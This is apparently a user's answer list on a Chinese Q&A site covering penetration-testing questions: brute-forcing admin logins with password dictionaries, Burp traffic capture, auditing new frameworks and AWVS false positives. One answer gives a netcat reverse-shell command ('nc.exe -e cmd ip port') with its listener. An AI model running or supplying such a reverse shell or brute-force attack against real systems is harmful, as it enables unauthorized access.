61 个回答
0 赞同
0 赞同
网站后台密码暴力破解如何发现并利用?
查看是否是cms搭建的或者是使用了框架,然后对测试用户名是否可以找到已创建的用户名,如果找到了真实的用户名,那么可以寻找密码字典进行爆破
回答于 2021-12-02 22:23
0 赞同
windows环境反弹shell是如何操作的?
最简单的一种就是,一端监听,一端发起,从而建立数据通信,nc.exe -e cmd ip 端口 。 nc -lvvp 端口
回答于 2021-12-02 17:27
0 赞同
0 赞同
0 赞同
0 赞同
burp抓包到底是抓的流量包还是本地包,为什么有人说是本地包,有...
流量包,相当于是你客户端访问服务器,然后之间的数据被抓取。burp是抓取的方式让你看到之间是怎么交互的
回答于 2021-11-12 16:42
0 赞同
0 赞同
面对一些新型的开发语言和框架(Go,nodejs,python等)有什么好...
找历史的漏洞,如果没有,就去下载相对应版本的源码下来审计,因为不是nday就是审计,或者是有其他功能点会出现漏洞可以利用
回答于 2021-11-12 16:39
1 赞同
关于awvs的sql注入
awvs测试出来的注入,误报率很高,我个人使用的情况就是基本都是错误的,然后手工验证的时候不出来,分析以下payload就知道是不是误报了,而不是awvs有payload那就是真的注入,不一定的事,你这个建议自己用sqlmap跑看看,或者手工
回答于 2021-11-12 16:37